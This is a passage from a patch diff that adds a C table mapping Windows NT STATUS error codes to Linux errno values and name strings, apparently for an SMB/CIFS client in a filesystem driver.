++	{STATUS_BAD_IMPERSONATION_LEVEL, -EIO,
++	"STATUS_BAD_IMPERSONATION_LEVEL"},
++	{STATUS_CANT_OPEN_ANONYMOUS, -EIO, "STATUS_CANT_OPEN_ANONYMOUS"},
++	{STATUS_BAD_VALIDATION_CLASS, -EIO, "STATUS_BAD_VALIDATION_CLASS"},
++	{STATUS_BAD_TOKEN_TYPE, -EIO, "STATUS_BAD_TOKEN_TYPE"},
++	{STATUS_BAD_MASTER_BOOT_RECORD, -EIO, "STATUS_BAD_MASTER_BOOT_RECORD"},
++	{STATUS_INSTRUCTION_MISALIGNMENT, -EIO,
++	"STATUS_INSTRUCTION_MISALIGNMENT"},
++	{STATUS_INSTANCE_NOT_AVAILABLE, -EIO, "STATUS_INSTANCE_NOT_AVAILABLE"},
++	{STATUS_PIPE_NOT_AVAILABLE, -EIO, "STATUS_PIPE_NOT_AVAILABLE"},
++	{STATUS_INVALID_PIPE_STATE, -EIO, "STATUS_INVALID_PIPE_STATE"},
++	{STATUS_PIPE_BUSY, -EBUSY, "STATUS_PIPE_BUSY"},
++	{STATUS_ILLEGAL_FUNCTION, -EIO, "STATUS_ILLEGAL_FUNCTION"},
++	{STATUS_PIPE_DISCONNECTED, -EPIPE, "STATUS_PIPE_DISCONNECTED"},
++	{STATUS_PIPE_CLOSING, -EIO, "STATUS_PIPE_CLOSING"},
++	{STATUS_PIPE_CONNECTED, -EIO, "STATUS_PIPE_CONNECTED"},
++	{STATUS_PIPE_LISTENING, -EIO, "STATUS_PIPE_LISTENING"},
++	{STATUS_INVALID_READ_MODE, -EIO, "STATUS_INVALID_READ_MODE"},
++	{STATUS_IO_TIMEOUT, -EAGAIN, "STATUS_IO_TIMEOUT"},
++	{STATUS_FILE_FORCED_CLOSED, -EIO, "STATUS_FILE_FORCED_CLOSED"},
++	{STATUS_PROFILING_NOT_STARTED, -EIO, "STATUS_PROFILING_NOT_STARTED"},
++	{STATUS_PROFILING_NOT_STOPPED, -EIO, "STATUS_PROFILING_NOT_STOPPED"},
++	{STATUS_COULD_NOT_INTERPRET, -EIO, "STATUS_COULD_NOT_INTERPRET"},
++	{STATUS_FILE_IS_A_DIRECTORY, -EISDIR, "STATUS_FILE_IS_A_DIRECTORY"},
++	{STATUS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_NOT_SUPPORTED"},
++	{STATUS_REMOTE_NOT_LISTENING, -EHOSTDOWN,
++	"STATUS_REMOTE_NOT_LISTENING"},
++	{STATUS_DUPLICATE_NAME, -ENOTUNIQ, "STATUS_DUPLICATE_NAME"},
++	{STATUS_BAD_NETWORK_PATH, -EINVAL, "STATUS_BAD_NETWORK_PATH"},
++	{STATUS_NETWORK_BUSY, -EBUSY, "STATUS_NETWORK_BUSY"},
++	{STATUS_DEVICE_DOES_NOT_EXIST, -ENODEV, "STATUS_DEVICE_DOES_NOT_EXIST"},
++	{STATUS_TOO_MANY_COMMANDS, -EIO, "STATUS_TOO_MANY_COMMANDS"},
++	{STATUS_ADAPTER_HARDWARE_ERROR, -EIO, "STATUS_ADAPTER_HARDWARE_ERROR"},
++	{STATUS_INVALID_NETWORK_RESPONSE, -EIO,
++	"STATUS_INVALID_NETWORK_RESPONSE"},
++	{STATUS_UNEXPECTED_NETWORK_ERROR, -EIO,
++	"STATUS_UNEXPECTED_NETWORK_ERROR"},
++	{STATUS_BAD_REMOTE_ADAPTER, -EIO, "STATUS_BAD_REMOTE_ADAPTER"},
++	{STATUS_PRINT_QUEUE_FULL, -EIO, "STATUS_PRINT_QUEUE_FULL"},
++	{STATUS_NO_SPOOL_SPACE, -EIO, "STATUS_NO_SPOOL_SPACE"},
++	{STATUS_PRINT_CANCELLED, -EIO, "STATUS_PRINT_CANCELLED"},
++	{STATUS_NETWORK_NAME_DELETED, -EREMCHG, "STATUS_NETWORK_NAME_DELETED"},
++	{STATUS_NETWORK_ACCESS_DENIED, -EACCES, "STATUS_NETWORK_ACCESS_DENIED"},
++	{STATUS_BAD_DEVICE_TYPE, -EIO, "STATUS_BAD_DEVICE_TYPE"},
++	{STATUS_BAD_NETWORK_NAME, -ENOENT, "STATUS_BAD_NETWORK_NAME"},
++	{STATUS_TOO_MANY_NAMES, -EIO, "STATUS_TOO_MANY_NAMES"},
++	{STATUS_TOO_MANY_SESSIONS, -EIO, "STATUS_TOO_MANY_SESSIONS"},
++	{STATUS_SHARING_PAUSED, -EIO, "STATUS_SHARING_PAUSED"},
++	{STATUS_REQUEST_NOT_ACCEPTED, -EIO, "STATUS_REQUEST_NOT_ACCEPTED"},
++	{STATUS_REDIRECTOR_PAUSED, -EIO, "STATUS_REDIRECTOR_PAUSED"},
++	{STATUS_NET_WRITE_FAULT, -EIO, "STATUS_NET_WRITE_FAULT"},
++	{STATUS_PROFILING_AT_LIMIT, -EIO, "STATUS_PROFILING_AT_LIMIT"},
++	{STATUS_NOT_SAME_DEVICE, -EXDEV, "STATUS_NOT_SAME_DEVICE"},
++	{STATUS_FILE_RENAMED, -EIO, "STATUS_FILE_RENAMED"},
++	{STATUS_VIRTUAL_CIRCUIT_CLOSED, -EIO, "STATUS_VIRTUAL_CIRCUIT_CLOSED"},
++	{STATUS_NO_SECURITY_ON_OBJECT, -EIO, "STATUS_NO_SECURITY_ON_OBJECT"},
++	{STATUS_CANT_WAIT, -EIO, "STATUS_CANT_WAIT"},
++	{STATUS_PIPE_EMPTY, -EIO, "STATUS_PIPE_EMPTY"},
++	{STATUS_CANT_ACCESS_DOMAIN_INFO, -EIO,
++	"STATUS_CANT_ACCESS_DOMAIN_INFO"},
++	{STATUS_CANT_TERMINATE_SELF, -EIO, "STATUS_CANT_TERMINATE_SELF"},
++	{STATUS_INVALID_SERVER_STATE, -EIO, "STATUS_INVALID_SERVER_STATE"},
++	{STATUS_INVALID_DOMAIN_STATE, -EIO, "STATUS_INVALID_DOMAIN_STATE"},
++	{STATUS_INVALID_DOMAIN_ROLE, -EIO, "STATUS_INVALID_DOMAIN_ROLE"},
++	{STATUS_NO_SUCH_DOMAIN, -EIO, "STATUS_NO_SUCH_DOMAIN"},
++	{STATUS_DOMAIN_EXISTS, -EIO, "STATUS_DOMAIN_EXISTS"},
++	{STATUS_DOMAIN_LIMIT_EXCEEDED, -EIO, "STATUS_DOMAIN_LIMIT_EXCEEDED"},
++	{STATUS_OPLOCK_NOT_GRANTED, -EIO, "STATUS_OPLOCK_NOT_GRANTED"},
++	{STATUS_INVALID_OPLOCK_PROTOCOL, -EIO,
++	"STATUS_INVALID_OPLOCK_PROTOCOL"},
++	{STATUS_INTERNAL_DB_CORRUPTION, -EIO, "STATUS_INTERNAL_DB_CORRUPTION"},
++	{STATUS_INTERNAL_ERROR, -EIO, "STATUS_INTERNAL_ERROR"},
++	{STATUS_GENERIC_NOT_MAPPED, -EIO, "STATUS_GENERIC_NOT_MAPPED"},
++	{STATUS_BAD_DESCRIPTOR_FORMAT, -EIO, "STATUS_BAD_DESCRIPTOR_FORMAT"},
++	{STATUS_INVALID_USER_BUFFER, -EIO, "STATUS_INVALID_USER_BUFFER"},
++	{STATUS_UNEXPECTED_IO_ERROR, -EIO, "STATUS_UNEXPECTED_IO_ERROR"},
++	{STATUS_UNEXPECTED_MM_CREATE_ERR, -EIO,
++	"STATUS_UNEXPECTED_MM_CREATE_ERR"},
++	{STATUS_UNEXPECTED_MM_MAP_ERROR, -EIO,
++	"STATUS_UNEXPECTED_MM_MAP_ERROR"},
++	{STATUS_UNEXPECTED_MM_EXTEND_ERR, -EIO,
++	"STATUS_UNEXPECTED_MM_EXTEND_ERR"},
++	{STATUS_NOT_LOGON_PROCESS, -EIO, "STATUS_NOT_LOGON_PROCESS"},
++	{STATUS_LOGON_SESSION_EXISTS, -EIO, "STATUS_LOGON_SESSION_EXISTS"},
++	{STATUS_INVALID_PARAMETER_1, -EINVAL, "STATUS_INVALID_PARAMETER_1"},
++	{STATUS_INVALID_PARAMETER_2, -EINVAL, "STATUS_INVALID_PARAMETER_2"},
++	{STATUS_INVALID_PARAMETER_3, -EINVAL, "STATUS_INVALID_PARAMETER_3"},
++	{STATUS_INVALID_PARAMETER_4, -EINVAL, "STATUS_INVALID_PARAMETER_4"},
++	{STATUS_INVALID_PARAMETER_5, -EINVAL, "STATUS_INVALID_PARAMETER_5"},
++	{STATUS_INVALID_PARAMETER_6, -EINVAL, "STATUS_INVALID_PARAMETER_6"},
++	{STATUS_INVALID_PARAMETER_7, -EINVAL, "STATUS_INVALID_PARAMETER_7"},
++	{STATUS_INVALID_PARAMETER_8, -EINVAL, "STATUS_INVALID_PARAMETER_8"},
++	{STATUS_INVALID_PARAMETER_9, -EINVAL, "STATUS_INVALID_PARAMETER_9"},
++	{STATUS_INVALID_PARAMETER_10, -EINVAL, "STATUS_INVALID_PARAMETER_10"},
++	{STATUS_INVALID_PARAMETER_11, -EINVAL, "STATUS_INVALID_PARAMETER_11"},
++	{STATUS_INVALID_PARAMETER_12, -EINVAL, "STATUS_INVALID_PARAMETER_12"},
++	{STATUS_REDIRECTOR_NOT_STARTED, -EIO, "STATUS_REDIRECTOR_NOT_STARTED"},
++	{STATUS_REDIRECTOR_STARTED, -EIO, "STATUS_REDIRECTOR_STARTED"},
++	{STATUS_STACK_OVERFLOW, -EIO, "STATUS_STACK_OVERFLOW"},
++	{STATUS_NO_SUCH_PACKAGE, -EIO, "STATUS_NO_SUCH_PACKAGE"},
++	{STATUS_BAD_FUNCTION_TABLE, -EIO, "STATUS_BAD_FUNCTION_TABLE"},
++	{STATUS_VARIABLE_NOT_FOUND, -EIO, "STATUS_VARIABLE_NOT_FOUND"},
++	{STATUS_DIRECTORY_NOT_EMPTY, -ENOTEMPTY, "STATUS_DIRECTORY_NOT_EMPTY"},
++	{STATUS_FILE_CORRUPT_ERROR, -EIO, "STATUS_FILE_CORRUPT_ERROR"},
++	{STATUS_NOT_A_DIRECTORY, -ENOTDIR, "STATUS_NOT_A_DIRECTORY"},
++	{STATUS_BAD_LOGON_SESSION_STATE, -EIO,
++	"STATUS_BAD_LOGON_SESSION_STATE"},
++	{STATUS_LOGON_SESSION_COLLISION, -EIO,
++	"STATUS_LOGON_SESSION_COLLISION"},
++	{STATUS_NAME_TOO_LONG, -ENAMETOOLONG, "STATUS_NAME_TOO_LONG"},
++	{STATUS_FILES_OPEN, -EIO, "STATUS_FILES_OPEN"},
++	{STATUS_CONNECTION_IN_USE, -EIO, "STATUS_CONNECTION_IN_USE"},
++	{STATUS_MESSAGE_NOT_FOUND, -EIO, "STATUS_MESSAGE_NOT_FOUND"},
++	{STATUS_PROCESS_IS_TERMINATING, -EIO, "STATUS_PROCESS_IS_TERMINATING"},
++	{STATUS_INVALID_LOGON_TYPE, -EIO, "STATUS_INVALID_LOGON_TYPE"},
++	{STATUS_NO_GUID_TRANSLATION, -EIO, "STATUS_NO_GUID_TRANSLATION"},
++	{STATUS_CANNOT_IMPERSONATE, -EIO, "STATUS_CANNOT_IMPERSONATE"},
++	{STATUS_IMAGE_ALREADY_LOADED, -EIO, "STATUS_IMAGE_ALREADY_LOADED"},
++	{STATUS_ABIOS_NOT_PRESENT, -EIO, "STATUS_ABIOS_NOT_PRESENT"},
++	{STATUS_ABIOS_LID_NOT_EXIST, -EIO, "STATUS_ABIOS_LID_NOT_EXIST"},
++	{STATUS_ABIOS_LID_ALREADY_OWNED, -EIO,
++	"STATUS_ABIOS_LID_ALREADY_OWNED"},
++	{STATUS_ABIOS_NOT_LID_OWNER, -EIO, "STATUS_ABIOS_NOT_LID_OWNER"},
++	{STATUS_ABIOS_INVALID_COMMAND, -EIO, "STATUS_ABIOS_INVALID_COMMAND"},
++	{STATUS_ABIOS_INVALID_LID, -EIO, "STATUS_ABIOS_INVALID_LID"},
++	{STATUS_ABIOS_SELECTOR_NOT_AVAILABLE, -EIO,
++	"STATUS_ABIOS_SELECTOR_NOT_AVAILABLE"},
++	{STATUS_ABIOS_INVALID_SELECTOR, -EIO, "STATUS_ABIOS_INVALID_SELECTOR"},
++	{STATUS_NO_LDT, -EIO, "STATUS_NO_LDT"},
++	{STATUS_INVALID_LDT_SIZE, -EIO, "STATUS_INVALID_LDT_SIZE"},
++	{STATUS_INVALID_LDT_OFFSET, -EIO, "STATUS_INVALID_LDT_OFFSET"},
++	{STATUS_INVALID_LDT_DESCRIPTOR, -EIO, "STATUS_INVALID_LDT_DESCRIPTOR"},
++	{STATUS_INVALID_IMAGE_NE_FORMAT, -EIO,
++	"STATUS_INVALID_IMAGE_NE_FORMAT"},
++	{STATUS_RXACT_INVALID_STATE, -EIO, "STATUS_RXACT_INVALID_STATE"},
++	{STATUS_RXACT_COMMIT_FAILURE, -EIO, "STATUS_RXACT_COMMIT_FAILURE"},
++	{STATUS_MAPPED_FILE_SIZE_ZERO, -EIO, "STATUS_MAPPED_FILE_SIZE_ZERO"},
++	{STATUS_TOO_MANY_OPENED_FILES, -EMFILE, "STATUS_TOO_MANY_OPENED_FILES"},
++	{STATUS_CANCELLED, -EIO, "STATUS_CANCELLED"},
++	{STATUS_CANNOT_DELETE, -EACCES, "STATUS_CANNOT_DELETE"},
++	{STATUS_INVALID_COMPUTER_NAME, -EIO, "STATUS_INVALID_COMPUTER_NAME"},
++	{STATUS_FILE_DELETED, -EIO, "STATUS_FILE_DELETED"},
++	{STATUS_SPECIAL_ACCOUNT, -EIO, "STATUS_SPECIAL_ACCOUNT"},
++	{STATUS_SPECIAL_GROUP, -EIO, "STATUS_SPECIAL_GROUP"},
++	{STATUS_SPECIAL_USER, -EIO, "STATUS_SPECIAL_USER"},
++	{STATUS_MEMBERS_PRIMARY_GROUP, -EIO, "STATUS_MEMBERS_PRIMARY_GROUP"},
++	{STATUS_FILE_CLOSED, -EBADF, "STATUS_FILE_CLOSED"},
++	{STATUS_TOO_MANY_THREADS, -EIO, "STATUS_TOO_MANY_THREADS"},
++	{STATUS_THREAD_NOT_IN_PROCESS, -EIO, "STATUS_THREAD_NOT_IN_PROCESS"},
++	{STATUS_TOKEN_ALREADY_IN_USE, -EIO, "STATUS_TOKEN_ALREADY_IN_USE"},
++	{STATUS_PAGEFILE_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_PAGEFILE_QUOTA_EXCEEDED"},
++	{STATUS_COMMITMENT_LIMIT, -EIO, "STATUS_COMMITMENT_LIMIT"},
++	{STATUS_INVALID_IMAGE_LE_FORMAT, -EIO,
++	"STATUS_INVALID_IMAGE_LE_FORMAT"},
++	{STATUS_INVALID_IMAGE_NOT_MZ, -EIO, "STATUS_INVALID_IMAGE_NOT_MZ"},
++	{STATUS_INVALID_IMAGE_PROTECT, -EIO, "STATUS_INVALID_IMAGE_PROTECT"},
++	{STATUS_INVALID_IMAGE_WIN_16, -EIO, "STATUS_INVALID_IMAGE_WIN_16"},
++	{STATUS_LOGON_SERVER_CONFLICT, -EIO, "STATUS_LOGON_SERVER_CONFLICT"},
++	{STATUS_TIME_DIFFERENCE_AT_DC, -EIO, "STATUS_TIME_DIFFERENCE_AT_DC"},
++	{STATUS_SYNCHRONIZATION_REQUIRED, -EIO,
++	"STATUS_SYNCHRONIZATION_REQUIRED"},
++	{STATUS_DLL_NOT_FOUND, -ENOENT, "STATUS_DLL_NOT_FOUND"},
++	{STATUS_OPEN_FAILED, -EIO, "STATUS_OPEN_FAILED"},
++	{STATUS_IO_PRIVILEGE_FAILED, -EIO, "STATUS_IO_PRIVILEGE_FAILED"},
++	{STATUS_ORDINAL_NOT_FOUND, -EIO, "STATUS_ORDINAL_NOT_FOUND"},
++	{STATUS_ENTRYPOINT_NOT_FOUND, -EIO, "STATUS_ENTRYPOINT_NOT_FOUND"},
++	{STATUS_CONTROL_C_EXIT, -EIO, "STATUS_CONTROL_C_EXIT"},
++	{STATUS_LOCAL_DISCONNECT, -EIO, "STATUS_LOCAL_DISCONNECT"},
++	{STATUS_REMOTE_DISCONNECT, -ESHUTDOWN, "STATUS_REMOTE_DISCONNECT"},
++	{STATUS_REMOTE_RESOURCES, -EIO, "STATUS_REMOTE_RESOURCES"},
++	{STATUS_LINK_FAILED, -EXDEV, "STATUS_LINK_FAILED"},
++	{STATUS_LINK_TIMEOUT, -ETIMEDOUT, "STATUS_LINK_TIMEOUT"},
++	{STATUS_INVALID_CONNECTION, -EIO, "STATUS_INVALID_CONNECTION"},
++	{STATUS_INVALID_ADDRESS, -EIO, "STATUS_INVALID_ADDRESS"},
++	{STATUS_DLL_INIT_FAILED, -EIO, "STATUS_DLL_INIT_FAILED"},
++	{STATUS_MISSING_SYSTEMFILE, -EIO, "STATUS_MISSING_SYSTEMFILE"},
++	{STATUS_UNHANDLED_EXCEPTION, -EIO, "STATUS_UNHANDLED_EXCEPTION"},
++	{STATUS_APP_INIT_FAILURE, -EIO, "STATUS_APP_INIT_FAILURE"},
++	{STATUS_PAGEFILE_CREATE_FAILED, -EIO, "STATUS_PAGEFILE_CREATE_FAILED"},
++	{STATUS_NO_PAGEFILE, -EIO, "STATUS_NO_PAGEFILE"},
++	{STATUS_INVALID_LEVEL, -EIO, "STATUS_INVALID_LEVEL"},
++	{STATUS_WRONG_PASSWORD_CORE, -EIO, "STATUS_WRONG_PASSWORD_CORE"},
++	{STATUS_ILLEGAL_FLOAT_CONTEXT, -EIO, "STATUS_ILLEGAL_FLOAT_CONTEXT"},
++	{STATUS_PIPE_BROKEN, -EPIPE, "STATUS_PIPE_BROKEN"},
++	{STATUS_REGISTRY_CORRUPT, -EIO, "STATUS_REGISTRY_CORRUPT"},
++	{STATUS_REGISTRY_IO_FAILED, -EIO, "STATUS_REGISTRY_IO_FAILED"},
++	{STATUS_NO_EVENT_PAIR, -EIO, "STATUS_NO_EVENT_PAIR"},
++	{STATUS_UNRECOGNIZED_VOLUME, -EIO, "STATUS_UNRECOGNIZED_VOLUME"},
++	{STATUS_SERIAL_NO_DEVICE_INITED, -EIO,
++	"STATUS_SERIAL_NO_DEVICE_INITED"},
++	{STATUS_NO_SUCH_ALIAS, -EIO, "STATUS_NO_SUCH_ALIAS"},
++	{STATUS_MEMBER_NOT_IN_ALIAS, -EIO, "STATUS_MEMBER_NOT_IN_ALIAS"},
++	{STATUS_MEMBER_IN_ALIAS, -EIO, "STATUS_MEMBER_IN_ALIAS"},
++	{STATUS_ALIAS_EXISTS, -EIO, "STATUS_ALIAS_EXISTS"},
++	{STATUS_LOGON_NOT_GRANTED, -EIO, "STATUS_LOGON_NOT_GRANTED"},
++	{STATUS_TOO_MANY_SECRETS, -EIO, "STATUS_TOO_MANY_SECRETS"},
++	{STATUS_SECRET_TOO_LONG, -EIO, "STATUS_SECRET_TOO_LONG"},
++	{STATUS_INTERNAL_DB_ERROR, -EIO, "STATUS_INTERNAL_DB_ERROR"},
++	{STATUS_FULLSCREEN_MODE, -EIO, "STATUS_FULLSCREEN_MODE"},
++	{STATUS_TOO_MANY_CONTEXT_IDS, -EIO, "STATUS_TOO_MANY_CONTEXT_IDS"},
++	{STATUS_LOGON_TYPE_NOT_GRANTED, -EIO, "STATUS_LOGON_TYPE_NOT_GRANTED"},
++	{STATUS_NOT_REGISTRY_FILE, -EIO, "STATUS_NOT_REGISTRY_FILE"},
++	{STATUS_NT_CROSS_ENCRYPTION_REQUIRED, -EIO,
++	"STATUS_NT_CROSS_ENCRYPTION_REQUIRED"},
++	{STATUS_DOMAIN_CTRLR_CONFIG_ERROR, -EIO,
++	"STATUS_DOMAIN_CTRLR_CONFIG_ERROR"},
++	{STATUS_FT_MISSING_MEMBER, -EIO, "STATUS_FT_MISSING_MEMBER"},
++	{STATUS_ILL_FORMED_SERVICE_ENTRY, -EIO,
++	"STATUS_ILL_FORMED_SERVICE_ENTRY"},
++	{STATUS_ILLEGAL_CHARACTER, -EIO, "STATUS_ILLEGAL_CHARACTER"},
++	{STATUS_UNMAPPABLE_CHARACTER, -EIO, "STATUS_UNMAPPABLE_CHARACTER"},
++	{STATUS_UNDEFINED_CHARACTER, -EIO, "STATUS_UNDEFINED_CHARACTER"},
++	{STATUS_FLOPPY_VOLUME, -EIO, "STATUS_FLOPPY_VOLUME"},
++	{STATUS_FLOPPY_ID_MARK_NOT_FOUND, -EIO,
++	"STATUS_FLOPPY_ID_MARK_NOT_FOUND"},
++	{STATUS_FLOPPY_WRONG_CYLINDER, -EIO, "STATUS_FLOPPY_WRONG_CYLINDER"},
++	{STATUS_FLOPPY_UNKNOWN_ERROR, -EIO, "STATUS_FLOPPY_UNKNOWN_ERROR"},
++	{STATUS_FLOPPY_BAD_REGISTERS, -EIO, "STATUS_FLOPPY_BAD_REGISTERS"},
++	{STATUS_DISK_RECALIBRATE_FAILED, -EIO,
++	"STATUS_DISK_RECALIBRATE_FAILED"},
++	{STATUS_DISK_OPERATION_FAILED, -EIO, "STATUS_DISK_OPERATION_FAILED"},
++	{STATUS_DISK_RESET_FAILED, -EIO, "STATUS_DISK_RESET_FAILED"},
++	{STATUS_SHARED_IRQ_BUSY, -EBUSY, "STATUS_SHARED_IRQ_BUSY"},
++	{STATUS_FT_ORPHANING, -EIO, "STATUS_FT_ORPHANING"},
++	{STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT, -EIO,
++	"STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT"},
++	{STATUS_PARTITION_FAILURE, -EIO, "STATUS_PARTITION_FAILURE"},
++	{STATUS_INVALID_BLOCK_LENGTH, -EIO, "STATUS_INVALID_BLOCK_LENGTH"},
++	{STATUS_DEVICE_NOT_PARTITIONED, -EIO, "STATUS_DEVICE_NOT_PARTITIONED"},
++	{STATUS_UNABLE_TO_LOCK_MEDIA, -EIO, "STATUS_UNABLE_TO_LOCK_MEDIA"},
++	{STATUS_UNABLE_TO_UNLOAD_MEDIA, -EIO, "STATUS_UNABLE_TO_UNLOAD_MEDIA"},
++	{STATUS_EOM_OVERFLOW, -EIO, "STATUS_EOM_OVERFLOW"},
++	{STATUS_NO_MEDIA, -EIO, "STATUS_NO_MEDIA"},
++	{STATUS_NO_SUCH_MEMBER, -EIO, "STATUS_NO_SUCH_MEMBER"},
++	{STATUS_INVALID_MEMBER, -EIO, "STATUS_INVALID_MEMBER"},
++	{STATUS_KEY_DELETED, -EIO, "STATUS_KEY_DELETED"},
++	{STATUS_NO_LOG_SPACE, -EIO, "STATUS_NO_LOG_SPACE"},
++	{STATUS_TOO_MANY_SIDS, -EIO, "STATUS_TOO_MANY_SIDS"},
++	{STATUS_LM_CROSS_ENCRYPTION_REQUIRED, -EIO,
++	"STATUS_LM_CROSS_ENCRYPTION_REQUIRED"},
++	{STATUS_KEY_HAS_CHILDREN, -EIO, "STATUS_KEY_HAS_CHILDREN"},
++	{STATUS_CHILD_MUST_BE_VOLATILE, -EIO, "STATUS_CHILD_MUST_BE_VOLATILE"},
++	{STATUS_DEVICE_CONFIGURATION_ERROR, -EIO,
++	"STATUS_DEVICE_CONFIGURATION_ERROR"},
++	{STATUS_DRIVER_INTERNAL_ERROR, -EIO, "STATUS_DRIVER_INTERNAL_ERROR"},
++	{STATUS_INVALID_DEVICE_STATE, -EIO, "STATUS_INVALID_DEVICE_STATE"},
++	{STATUS_IO_DEVICE_ERROR, -EIO, "STATUS_IO_DEVICE_ERROR"},
++	{STATUS_DEVICE_PROTOCOL_ERROR, -EIO, "STATUS_DEVICE_PROTOCOL_ERROR"},
++	{STATUS_BACKUP_CONTROLLER, -EIO, "STATUS_BACKUP_CONTROLLER"},
++	{STATUS_LOG_FILE_FULL, -EIO, "STATUS_LOG_FILE_FULL"},
++	{STATUS_TOO_LATE, -EIO, "STATUS_TOO_LATE"},
++	{STATUS_NO_TRUST_LSA_SECRET, -EIO, "STATUS_NO_TRUST_LSA_SECRET"},
++	{STATUS_NO_TRUST_SAM_ACCOUNT, -EIO, "STATUS_NO_TRUST_SAM_ACCOUNT"},
++	{STATUS_TRUSTED_DOMAIN_FAILURE, -EIO, "STATUS_TRUSTED_DOMAIN_FAILURE"},
++	{STATUS_TRUSTED_RELATIONSHIP_FAILURE, -EIO,
++	"STATUS_TRUSTED_RELATIONSHIP_FAILURE"},
++	{STATUS_EVENTLOG_FILE_CORRUPT, -EIO, "STATUS_EVENTLOG_FILE_CORRUPT"},
++	{STATUS_EVENTLOG_CANT_START, -EIO, "STATUS_EVENTLOG_CANT_START"},
++	{STATUS_TRUST_FAILURE, -EIO, "STATUS_TRUST_FAILURE"},
++	{STATUS_MUTANT_LIMIT_EXCEEDED, -EIO, "STATUS_MUTANT_LIMIT_EXCEEDED"},
++	{STATUS_NETLOGON_NOT_STARTED, -EIO, "STATUS_NETLOGON_NOT_STARTED"},
++	{STATUS_ACCOUNT_EXPIRED, -EKEYEXPIRED, "STATUS_ACCOUNT_EXPIRED"},
++	{STATUS_POSSIBLE_DEADLOCK, -EIO, "STATUS_POSSIBLE_DEADLOCK"},
++	{STATUS_NETWORK_CREDENTIAL_CONFLICT, -EIO,
++	"STATUS_NETWORK_CREDENTIAL_CONFLICT"},
++	{STATUS_REMOTE_SESSION_LIMIT, -EIO, "STATUS_REMOTE_SESSION_LIMIT"},
++	{STATUS_EVENTLOG_FILE_CHANGED, -EIO, "STATUS_EVENTLOG_FILE_CHANGED"},
++	{STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT, -EIO,
++	"STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT"},
++	{STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, -EIO,
++	"STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT"},
++	{STATUS_NOLOGON_SERVER_TRUST_ACCOUNT, -EIO,
++	"STATUS_NOLOGON_SERVER_TRUST_ACCOUNT"},
++	{STATUS_DOMAIN_TRUST_INCONSISTENT, -EIO,
++	"STATUS_DOMAIN_TRUST_INCONSISTENT"},
++	{STATUS_FS_DRIVER_REQUIRED, -EOPNOTSUPP, "STATUS_FS_DRIVER_REQUIRED"},
++	{STATUS_IMAGE_ALREADY_LOADED_AS_DLL, -EIO,
++	"STATUS_IMAGE_ALREADY_LOADED_AS_DLL"},
++	{STATUS_NETWORK_OPEN_RESTRICTION, -EIO,
++	"STATUS_NETWORK_OPEN_RESTRICTION"},
++	{STATUS_NO_USER_SESSION_KEY, -EIO, "STATUS_NO_USER_SESSION_KEY"},
++	{STATUS_USER_SESSION_DELETED, -EIO, "STATUS_USER_SESSION_DELETED"},
++	{STATUS_RESOURCE_LANG_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_LANG_NOT_FOUND"},
++	{STATUS_INSUFF_SERVER_RESOURCES, -EIO,
++	"STATUS_INSUFF_SERVER_RESOURCES"},
++	{STATUS_INVALID_BUFFER_SIZE, -EIO, "STATUS_INVALID_BUFFER_SIZE"},
++	{STATUS_INVALID_ADDRESS_COMPONENT, -EIO,
++	"STATUS_INVALID_ADDRESS_COMPONENT"},
++	{STATUS_INVALID_ADDRESS_WILDCARD, -EIO,
++	"STATUS_INVALID_ADDRESS_WILDCARD"},
++	{STATUS_TOO_MANY_ADDRESSES, -EIO, "STATUS_TOO_MANY_ADDRESSES"},
++	{STATUS_ADDRESS_ALREADY_EXISTS, -EADDRINUSE,
++	"STATUS_ADDRESS_ALREADY_EXISTS"},
++	{STATUS_ADDRESS_CLOSED, -EIO, "STATUS_ADDRESS_CLOSED"},
++	{STATUS_CONNECTION_DISCONNECTED, -ECONNABORTED,
++	"STATUS_CONNECTION_DISCONNECTED"},
++	{STATUS_CONNECTION_RESET, -ENETRESET, "STATUS_CONNECTION_RESET"},
++	{STATUS_TOO_MANY_NODES, -EIO, "STATUS_TOO_MANY_NODES"},
++	{STATUS_TRANSACTION_ABORTED, -EIO, "STATUS_TRANSACTION_ABORTED"},
++	{STATUS_TRANSACTION_TIMED_OUT, -EIO, "STATUS_TRANSACTION_TIMED_OUT"},
++	{STATUS_TRANSACTION_NO_RELEASE, -EIO, "STATUS_TRANSACTION_NO_RELEASE"},
++	{STATUS_TRANSACTION_NO_MATCH, -EIO, "STATUS_TRANSACTION_NO_MATCH"},
++	{STATUS_TRANSACTION_RESPONDED, -EIO, "STATUS_TRANSACTION_RESPONDED"},
++	{STATUS_TRANSACTION_INVALID_ID, -EIO, "STATUS_TRANSACTION_INVALID_ID"},
++	{STATUS_TRANSACTION_INVALID_TYPE, -EIO,
++	"STATUS_TRANSACTION_INVALID_TYPE"},
++	{STATUS_NOT_SERVER_SESSION, -EIO, "STATUS_NOT_SERVER_SESSION"},
++	{STATUS_NOT_CLIENT_SESSION, -EIO, "STATUS_NOT_CLIENT_SESSION"},
++	{STATUS_CANNOT_LOAD_REGISTRY_FILE, -EIO,
++	"STATUS_CANNOT_LOAD_REGISTRY_FILE"},
++	{STATUS_DEBUG_ATTACH_FAILED, -EIO, "STATUS_DEBUG_ATTACH_FAILED"},
++	{STATUS_SYSTEM_PROCESS_TERMINATED, -EIO,
++	"STATUS_SYSTEM_PROCESS_TERMINATED"},
++	{STATUS_DATA_NOT_ACCEPTED, -EIO, "STATUS_DATA_NOT_ACCEPTED"},
++	{STATUS_NO_BROWSER_SERVERS_FOUND, -EIO,
++	"STATUS_NO_BROWSER_SERVERS_FOUND"},
++	{STATUS_VDM_HARD_ERROR, -EIO, "STATUS_VDM_HARD_ERROR"},
++	{STATUS_DRIVER_CANCEL_TIMEOUT, -EIO, "STATUS_DRIVER_CANCEL_TIMEOUT"},
++	{STATUS_REPLY_MESSAGE_MISMATCH, -EIO, "STATUS_REPLY_MESSAGE_MISMATCH"},
++	{STATUS_MAPPED_ALIGNMENT, -EIO, "STATUS_MAPPED_ALIGNMENT"},
++	{STATUS_IMAGE_CHECKSUM_MISMATCH, -EIO,
++	"STATUS_IMAGE_CHECKSUM_MISMATCH"},
